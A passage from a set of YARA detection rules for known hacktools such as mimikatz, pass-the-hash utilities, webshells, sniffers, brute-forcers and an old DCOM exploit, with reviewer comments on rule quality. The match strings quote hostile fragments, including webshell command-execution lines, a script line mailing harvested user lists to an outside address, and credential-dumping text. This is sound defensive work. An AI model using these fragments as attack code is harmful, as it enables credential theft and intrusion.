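		$s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */
		$s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '43.00' */
		$s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.00' */
		$s3 = "username:domainname:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */
		$s4 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */
		$s5 = "Error: Cannot open LSASS.EXE!." fullword ascii /* score: '12.00' */
		$s6 = "nthash is too long!." fullword ascii /* score: '8.00' */
		$s7 = "LSASS HANDLE: %x" fullword ascii /* score: '5.00' */
	condition:
		uint16(0) == 0x5a4d and filesize < 240KB and 2 of them
}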
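rule perlcmd_zip_Folder_cmd {
	// Perl CGI webshell: QUERY_STRING ($s5) is URL-decoded ($s1, $s12) and passed
	// straight to system() ($s6, $s7). Source-text rule; 6 of 8 required so the
	// exec chain must be present alongside the HTML wrapper.
	meta:
		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
	strings:
		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
		$s1 = "s/%20/ /ig;" fullword ascii
		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
		$s6 = "$execthis = $_;" fullword ascii
		$s7 = "system($execthis);" fullword ascii
		$s12 = "s/%2f/\\//ig;" fullword ascii
	condition:
		6 of them
}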
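rule SQLMap
{
	// Matches sqlmap *source* by one exception-handler line. NOTE(review): the
	// string uses Python-2-only `except X, ex:` syntax; any Python-3-compatible
	// release spells it `except SqlmapBaseException as ex:` and will not match -
	// confirm coverage against current upstream before relying on this rule.
	// Compiled .pyc or packaged copies are not covered.
	meta:
		author = "Florian Roth"
		description = "This signature detects the SQLMap SQL injection tool"
		date = "07/2014"
		score = 60
	strings:
		$s1 = "except SqlmapBaseException, ex:"
	condition:
		1 of them
}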
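rule Dos_1 {
	// "Churrasco" token-kidnapping exploit: runs a command as SYSTEM from an IIS
	// or SQL Server service context. Both banner strings required, MZ + 1000KB.
	meta:
		description = "Chinese Hacktool Set - file 1.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "b554f0687a12ec3a137f321cc15e052ff219f28c"
	strings:
		$s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii
		$s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}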
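rule CN_Hacktool_MilkT_BAT {
	// Batch wrapper shipped with the MilkT port scanner; $s0 is the scan-result
	// filtering loop (s1.txt -> s2.txt). Text file, so no type guard applies.
	meta:
		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
		author = "Florian Roth"
		score = 70
		date = "12.10.2014"
	strings:
		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
	condition:
		all of them
}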
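rule CookieTools2 {
	// Cookie-spoofing/injection GUI tool (Delphi build). $s3 (MSIE UA fragment) and
	// $s4 (Borland registry key) are generic; $s1 (gxgl.com domains) and $s2
	// carry the signal. `all of them` plus the 700KB cap limits FPs.
	meta:
		description = "Chinese Hacktool Set - file CookieTools2.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "cb67797f229fdb92360319e01277e1345305eb82"
	strings:
		$s1 = "www.gxgl.com&www.gxgl.net" fullword wide
		$s2 = "ip.asp?IP=" fullword ascii
		$s3 = "MSIE 5.5;" fullword ascii
		$s4 = "SOFTWARE\\Borland\\" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 700KB and all of them
}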
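rule Angry_IP_Scanner_v2_08_ipscan {
	// yarGen rule on a packed Angry IP Scanner 2.08 build (string fragments).
	// Angry IP Scanner is a legitimate, widely used network tool - dual-use.
	// Sibling rule FeliksPack3___Scanners_ipscan covers a different build.
	meta:
		description = "Auto-generated rule on file ipscan.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "70cf2c09776a29c3e837cb79d291514a"
	strings:
		$s0 = "_H/EnumDisplay/"
		$s5 = "ECTED.MSVCRT0x"
		$s8 = "NotSupported7"
	condition:
		all of them
}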
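rule wineggdrop : portscanner toolkit
{
    // WinEggDrop TCP/SYN port scanner. $a is the banner
    // "TCP Port Scanner V?.? By WinEggDrop\n" as hex with nibble wildcards on the
    // version digits; the trailing "\n" in $c is a YARA escape, not two characters.
    meta:
        author = "Christian Rebischke (@sh1bumi)"
        date = "2015-09-05"
        description = "Rules for TCP Portscanner VX.X by WinEggDrop"
        in_the_wild = true
        family = "Hackingtool/Portscanner"

    strings:
        $a = { 54 43 50 20 50 6f 72 74 20 53 63 61 6e 6e 65 72
               20 56 3? 2e 3? 20 42 79 20 57 69 6e 45 67 67 44
               72 6f 70 0a }
        $b = "Result.txt"
        $c = "Usage:   %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\n"

    condition:
        //check for MZ Signature at offset 0
        uint16(0) == 0x5A4D

        and

        //check for wineggdrop specific strings
        $a and $b and $c
}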
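rule lamescan3 {
	// Radmin brute-forcer: ships login/password dictionaries ($s1, $s4) and a
	// bundled Radmin client ($s2). All four strings required.
	meta:
		description = "Chinese Hacktool Set - file lamescan3.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"
	strings:
		$s1 = "dic\\loginlist.txt" fullword ascii
		$s2 = "Radmin.exe" fullword ascii
		$s3 = "lamescan3.pdf!" fullword ascii
		$s4 = "dic\\passlist.txt" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 3740KB and all of them
}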
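rule ProPort_zip_Folder_ProPort {
	// ProPort - a *defensive* port/trojan scanner (exports DllTrojanScan,
	// GetTrojanNumber, GetFileCRC32) packed with Petite ($s4). A hit indicates the
	// tool is present, not an infection; $s1 is an opaque packer artefact.
	meta:
		description = "Auto-generated rule on file ProPort.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
	strings:
		$s0 = "Corrupt Data!"
		$s1 = "K4p~omkIz"
		$s2 = "DllTrojanScan"
		$s3 = "GetDllInfo"
		$s4 = "Compressed by Petite (c)1999 Ian Luck."
		$s5 = "GetFileCRC32"
		$s6 = "GetTrojanNumber"
		$s7 = "TFAKAbout"
	condition:
		all of them
}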
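rule sig_238_cmd_2 {
	// Classic cmd.jsp webshell: request parameter ($s2) -> Runtime.exec ($s0),
	// output streamed back ($s1, $s3). $s2 and $s4 are ordinary JSP, but all five
	// are required so only the exec-and-echo pattern matches.
	meta:
		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
	strings:
		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
		$s1 = "InputStream in = child.getInputStream();" fullword ascii
		$s2 = "String cmd = request.getParameter(\"" ascii
		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
	condition:
		all of them
}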
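rule crack_Loader {
	// NOTE(review): weakest rule in this set - two strings, one of which ($s1) is
	// an opaque byte run with no semantic meaning, and no MZ/filesize guard.
	// Corroborate any hit against the MD5 in meta before acting on it.
	meta:
		description = "Auto-generated rule on file Loader.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
	strings:
		$s0 = "NeoWait.exe"
		$s1 = "RRRRRRRW"
	condition:
		all of them
}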
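rule dat_report {
	// Report-generation DLL of the X-Scan vulnerability scanner (xfocus).
	// Dual-use scanner component; both strings required.
	meta:
		description = "Chinese Hacktool Set - file report.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2"
	strings:
		$s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii
		$s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 480KB and all of them
}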
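rule superscan3_0 {
	// Foundstone SuperScan 3.0 InstallShield package: stub names ($s5, $s6, $s10)
	// are generic InstallShield, the scanner file list ($s0-$s4, $s8, $s9) is
	// specific. Legitimate dual-use scanner; all nine strings required.
	meta:
		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
	strings:
		$s0 = "\\scanner.ini" fullword ascii
		$s1 = "\\scanner.exe" fullword ascii
		$s2 = "\\scanner.lst" fullword ascii
		$s4 = "\\hensss.lst" fullword ascii
		$s5 = "STUB32.EXE" fullword wide
		$s6 = "STUB.EXE" fullword wide
		$s8 = "\\ws2check.exe" fullword ascii
		$s9 = "\\trojans.lst" fullword ascii
		$s10 = "1996 InstallShield Software Corporation" fullword wide
	condition:
		all of them
}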
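rule sekurlsa {
	// Early mimikatz sekurlsa module, identified by its French UI strings; $s3 is
	// the LSA secrets registry path it reads. All four required, 1150KB cap.
	meta:
		description = "Chinese Hacktool Set - file sekurlsa.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
	strings:
		$s1 = "Bienvenue dans un processus distant" fullword wide
		$s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
		$s3 = "SECURITY\\Policy\\Secrets" fullword wide
		$s4 = "Injection de donn" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 1150KB and all of them
}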
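rule scanarator_iis {
	// yarGen rule for an IIS exploit/checker. $s1 ("send error") is generic; the
	// usage line $s0 is the discriminator. No MZ/filesize guard; both required.
	meta:
		description = "Auto-generated rule on file iis.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
	strings:
		$s0 = "example: iis 10.10.10.10"
		$s1 = "send error"
	condition:
		all of them
}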
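rule Dos_iis {
	// IIS privilege-escalation tool (WMI IIsWebInfo query, wmiprvse.exe target).
	// Several strings are truncated as found in the binary ("program terming",
	// "WinSta0\\Defau") and match as substrings; all seven required, <70KB.
	meta:
		description = "Chinese Hacktool Set - file iis.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"
	strings:
		$s1 = "comspec" fullword ascii
		$s2 = "program terming" fullword ascii
		$s3 = "WinSta0\\Defau" fullword ascii
		$s4 = "* FROM IIsWebInfo" ascii
		$s5 = "www.icehack." ascii
		$s6 = "wmiprvse.exe" fullword ascii
		$s7 = "Pid: %d" ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 70KB and all of them
}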
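rule mimikatz_lsass_mdmp
{
	// Minidump of lsass.exe: uint32(0) == 0x504d444d is the little-endian "MDMP"
	// magic, and the wide path string identifies the dumped process. This fires
	// on *any* lsass minidump - ProcDump output, Task Manager dumps, crash dumps -
	// which is intended: such a file is a credential-dumping artefact regardless
	// of who produced it.
	meta:
		description		= "LSASS minidump file for mimikatz"
		author			= "Benjamin DELPY (gentilkiwi)"

	strings:
		$lsass			= "System32\\lsass.exe"	wide nocase

	condition:
		(uint32(0) == 0x504d444d) and $lsass
}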
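rule UnPack_rar_Folder_TBack {
	// TBack backdoor DLL, detected by its interactive command help text
	// (port redirector, downloader, password sniffer, service control, shell).
	// 4 of 17 - every string is help-text specific, so FP risk is low.
	meta:
		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
	strings:
		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
		$s8 = "Shell                                 -->Get A Shell" fullword ascii
		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
		$s13 = "Online                                -->List All Connected IP" fullword ascii
		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
		$s19 = "Reboot                                -->Reboot The System" fullword ascii
		$s20 = "Password Sniffering Is Not Running" fullword ascii
	condition:
		4 of them
}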
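rule LinuxHacktool_eyes_mass {
	// Shell-script driver of the "eyes" SSH mass-scan kit. `1 of them` is fine:
	// each string is kit-specific (results mailed to clubby@slucia.com in $s0,
	// crew banner in $s1, pscan2 cleanup in $s3). $s0 is shared with
	// LinuxHacktool_eyes_a, so both rules hit the same exfil line.
	meta:
		description = "Linux hack tools - file mass"
		author = "Florian Roth"
		reference = "not set"
		date = "2015/01/19"
		hash = "2054cb427daaca9e267b252307dad03830475f15"
	strings:
		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
		$s3 = "killall -9 pscan2" fullword ascii
		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
	condition:
		1 of them
}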
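rule SplitJoin_V1_3_3_rar_Folder_3 {
	// Second SplitJoin build (ASCII strings, different hash from rule splitjoin).
	// Benign file-splitter bundled in a kit - tool presence, not malware.
	meta:
		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "21409117b536664a913dcd159d6f4d8758f43435"
	strings:
		$s2 = "ie686@sohu.com" fullword ascii
		$s3 = "splitjoin.exe" fullword ascii
		$s7 = "SplitJoin" fullword ascii
	condition:
		all of them
}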
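rule sig_238_xsniff {
	// Duplicate coverage of CN_Tools_xsniff (identical sample hash) with a larger
	// string set and no MZ guard; 6 of 9 required. xsniff logs captured
	// credentials in cleartext ($s5).
	meta:
		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
	strings:
		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
		$s3 = "%s - simple sniffer for win2000" fullword ascii
		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
		$s7 = "http://www.xfocus.org" fullword ascii
		$s9 = "  -pass        : Filter username/password" fullword ascii
		$s18 = "  -udp         : Output udp packets" fullword ascii
		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
		$s20 = "  -tcp         : Output tcp packets" fullword ascii
	condition:
		6 of them
}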
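rule Ncrack
{
	// Single internal error message from Ncrack's output-table code; matches the
	// binary and source alike. Ncrack is a legitimate (Nmap project) brute-forcer,
	// so treat hits as dual-use.
	meta:
		author = "Florian Roth"
		description = "This signature detects the Ncrack brute force tool"
		date = "07/2014"
		score = 60
	strings:
		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
	condition:
		1 of them
}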
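rule mimikatz
{
	// gentilkiwi's upstream mimikatz rule. It keys on code byte patterns per
	// build flavour (x86/x64 exe, dll, driver) rather than strings, so it survives
	// string obfuscation; the [0-3] jumps absorb register/encoding differences
	// between compilers. Condition is an OR of the per-flavour groups, so one
	// complete group is enough.
	meta:
		description		= "mimikatz"
		author			= "Benjamin DELPY (gentilkiwi)"
		tool_author		= "Benjamin DELPY (gentilkiwi)"
		score          = 80
	strings:
		$exe_x86_1		= { 89 71 04 89 [0-3] 30 8d 04 bd }
		$exe_x86_2		= { 89 79 04 89 [0-3] 38 8d 04 b5 }

		$exe_x64_1		= { 4c 03 d8 49 [0-3] 8b 03 48 89 }
		$exe_x64_2		= { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }

		$dll_1			= { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
		$dll_2			= { c7 0? 10 02 00 00 ?? 89 4? }

		$sys_x86		= { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
		$sys_x64		= { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }

	condition:
		(all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*))
}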
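rule Fierce2
{
	// Matches the Perl source of the Fierce2 DNS/domain scanner by one
	// Template-Toolkit call. Source-text only; a packed or fatpacked copy may not
	// contain this line.
	meta:
		author = "Florian Roth"
		description = "This signature detects the Fierce2 domain scanner"
		date = "07/2014"
		score = 60
	strings:
		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
	condition:
		1 of them
}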
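rule APT_Proxy_Malware_Packed_dev
{
	// PECompact2-packed proxy implant. "PECompact2" is the packer tag and
	// "[LordPE]" marks a PE rebuilt/dumped with LordPE - both are generic on their
	// own; steam_ker.dll is the sample-specific name. No MZ guard, all three
	// required, score 50.
	meta:
		author = "FRoth"
		date = "2014-11-10"
		description = "APT Malware - Proxy"
		hash = "6b6a86ceeab64a6cb273debfa82aec58"
		score = 50
	strings:
		$string0 = "PECompact2" fullword
		$string1 = "[LordPE]"
		$string2 = "steam_ker.dll"
	condition:
		all of them
}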
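rule cndcom_cndcom {
	// MS03-026 DCOM RPC buffer-overflow exploit (HDM rewrite of the FlashSky /
	// Benjurry code, with a Chinese target table). $s7 is the UNC path to a C$
	// share used in the trigger - lateral-movement context. 2 of 8, <100KB.
	meta:
		description = "Chinese Hacktool Set - file cndcom.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "08bbe6312342b28b43201125bd8c518531de8082"
	strings:
		$s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii
		$s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii
		$s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii
		$s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii
		$s5 = "Windows NT SP6 (Chinese)" fullword ascii
		$s6 = "- Original code by FlashSky and Benjurry" fullword ascii
		$s7 = "\\C$\\123456111111111111111.doc" fullword wide
		$s8 = "shell3all.c" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
}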
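rule LinuxHacktool_eyes_a {
	// Shell-script front end of the "eyes" kit: runs pscan2 on port 22 ($s4) and
	// mails results out ($s0). $s2 ("rm -rf bios.txt") is generic; 2 of 6 means it
	// must pair with a kit-specific line.
	meta:
		description = "Linux hack tools - file a"
		author = "Florian Roth"
		reference = "not set"
		date = "2015/01/19"
		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
	strings:
		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
		$s1 = "mv scan.log bios.txt" fullword ascii
		$s2 = "rm -rf bios.txt" fullword ascii
		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
		$s4 = "././pscan2 $1 22" fullword ascii
		$s10 = "echo \"#cautam...\"" fullword ascii
	condition:
		2 of them
}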
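rule sig_238_hunt {
	// "hunt" by JD Glaser - SMB share enumerator and admin finder (legit recon
	// tool). All seven strings required; no MZ guard.
	meta:
		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
	strings:
		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
		$s3 = "Usage - hunt \\\\servername" fullword ascii
		$s4 = ".share = %S - %S" fullword wide
		$s5 = "SMB share enumerator and admin finder " fullword ascii
		$s7 = "Hunt only runs on Windows NT..." fullword ascii
		$s8 = "User = %S" fullword ascii
		$s9 = "Admin is %s\\%s" fullword ascii
	condition:
		all of them
}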
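rule Dos_Down32 {
	// .NET downloader ($s15 get_Form1 is a WinForms property accessor) that
	// stages command output in C:\Windows\Temp\Cmd.txt. All three required, <137KB.
	meta:
		description = "Chinese Hacktool Set - file Down32.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "0365738acd728021b0ea2967c867f1014fd7dd75"
	strings:
		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
		$s6 = "down.exe" fullword wide
		$s15 = "get_Form1" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 137KB and all of them
}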
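rule PassSniffer_zip_Folder_readme {
	// Targets the *readme.txt* of a POP3/FTP password sniffer, not the sniffer
	// binary. NOTE(review): `1 of them` on plain-English strings such as
	// "Password Sniffer V1.0" can hit AV descriptions or documentation; treat a
	// hit as a low-confidence lead unless $s0 (the exe name) is the match.
	meta:
		description = "Disclosed hacktool set (old stuff) - file readme.txt"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
	strings:
		$s0 = "PassSniffer.exe" fullword ascii
		$s1 = "POP3/FTP Sniffer" fullword ascii
		$s2 = "Password Sniffer V1.0" fullword ascii
	condition:
		1 of them
}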
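rule HackTool_Samples {
	// Generic catch-all: `1 of` 26 strings, no file-type or size guard.
	// NOTE(review): several strings are ordinary English ("Dumping password",
	// "Dump system passwords", "dictionary attack with specified dictionary
	// file", "Impersonation Tokens Available") and occur in security
	// documentation, AV signature databases and in this rule file itself -
	// expect self-hits and FPs on analyst workstations. Strings are
	// case-sensitive (no `nocase`): $v's "LMhash:NThash" does not match the
	// lowercase form used by iam-alt (see rule iam_alt_iam_alt). Score 50 is
	// appropriate; do not alert on this rule alone.
	meta:
		description = "Hacktool"
		score = 50
	strings:
		$a = "Unable to uninstall the fgexec service"
		$b = "Unable to set socket to sniff"
		$c = "Failed to load SAM functions"
		$d = "Dump system passwords"
		$e = "Error opening sam hive or not valid file"
		$f = "Couldn't find LSASS pid"
		$g = "samdump.dll"
		$h = "WPEPRO SEND PACKET"
		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
		$k = "arpspoof\\Debug"
		$l = "Success: The log has been cleared"
		$m = "clearlogs [\\\\computername"
		$n = "DumpUsers 1."
		$o = "dictionary attack with specified dictionary file"
		$p = "by Objectif Securite"
		$q = "objectif-securite"
		$r = "Cannot query LSA Secret on remote host"
		$s = "Cannot write to process memory on remote host"
		$t = "Cannot start PWDumpX service on host"
		$u = "usage: %s <system hive> <security hive>"
		$v = "username:domainname:LMhash:NThash"
		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
		$x = "Impersonation Tokens Available"
		$y = "failed to parse pwdump format string"
		$z = "Dumping password"
	condition:
		1 of them
}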
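rule Ncat_Hacktools_CN {
	// Detects the netcat build (nc.exe) bundled in this tool set via its usage
	// text and internal messages. netcat is dual-use; a hit on an admin host
	// needs context (who dropped it, what it connected to) before escalation.
	meta:
		description = "Disclosed hacktool set - file nc.exe"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "001c0c01c96fa56216159f83f6f298755366e528"
	strings:
		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
		$s3 = "gethostpoop fuxored" fullword ascii
		$s6 = "VERNOTSUPPORTED" fullword ascii
		$s7 = "%s [%s] %d (%s)" fullword ascii
		$s12 = " `--%s' doesn't allow an argument" fullword ascii
	condition:
		all of them
}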
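rule DK_Brute {
	// Detects the "DK Brute" credential brute-forcer from a PoS scammer toolbox
	// by its .NET property accessors and author tag.
	meta:
		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
		author = "Florian Roth"
		date = "22.11.14"
		score = 70
		reference = "http://goo.gl/xiIphp"
		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
	strings:
		$s6 = "get_CrackedCredentials" fullword ascii
		$s13 = "Same port used for two different protocols:" fullword wide
		$s18 = "coded by fLaSh" fullword ascii
		$s19 = "get_grbToolsScaningCracking" fullword ascii
	condition:
		all of them
}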
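rule mysql_pwd_crack {
	// Detects the mysql_pwd_crack password guesser by its usage examples,
	// success message and author contact string. `1 of them` is acceptable
	// here because every string is tool-specific.
	meta:
		description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"
	strings:
		$s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii
		$s2 = "Successfully --> username %s password %s " fullword ascii
		$s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii
		$s4 = "-a automode  automatic crack the mysql password " fullword ascii
		$s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 100KB and 1 of them
}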
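rule iam_iam : Toolkit  {
	// Detects iam.exe from the Core Security Pass-The-Hash Toolkit by its help
	// text and LSASRV.DLL probing message. All strings required.
	meta:
		description = "Auto-generated rule - file iam.exe"
		author = "Florian Roth"
		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
		date = "2015-07-10"
		score = 80
		hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
	strings:
		$s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */
		$s2 = "iam.exe -h administrator:mydomain:"  ascii /* PEStudio Blacklist: strings */ /* score: '40.00' */
		$s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii /* PEStudio Blacklist: strings */ /* score: '33.00' */
		$s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
		$s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii /* score: '26.00' */
		$s6 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */
		$s7 = "Checking LSASRV.DLL...." fullword ascii /* score: '12.00' */
	condition:
		uint16(0) == 0x5a4d and filesize < 300KB and all of them
}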
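rule Hacktools_CN_Http {
	// Detects the tiny Http.exe from the 445TOOL set. Every string is a generic
	// import/DLL name, so the `filesize < 10KB` clause is what carries the
	// specificity — keep it if this rule is ever edited.
	meta:
		description = "Disclosed hacktool set - file Http.exe"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
	strings:
		$s0 = "RPCRT4.DLL" fullword ascii
		$s1 = "WNetAddConnection2A" fullword ascii
		$s2 = "NdrPointerBufferSize" fullword ascii
		$s3 = "_controlfp" fullword ascii
	condition:
		all of them and filesize < 10KB
}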
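rule HScan_v1_20_hscan {
	// Detects the HScan v1.20 network scanner by its result messages, usage
	// example and relative log/report paths.
	meta:
		description = "Chinese Hacktool Set - file hscan.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
	strings:
		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii
		$s3 = ".\\report\\%s-%s.html" fullword ascii
		$s4 = ".\\log\\Hscan.log" fullword ascii
		$s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
}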
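rule Payload_Exe2Hex : toolkit {
	// Detects text payloads produced by exe2hex: a PE ("4d5a") re-encoded as
	// batch `set /p`, PowerShell `$hex=`, or DEBUG.EXE `echo` lines. The $b*
	// and $d* groups are the URL-encoded variants of $a* and $c*; each group
	// must match completely, which keeps FPs on ordinary scripts low.
	meta:
		description = "Detects payload generated by exe2hex"
		author = "Florian Roth"
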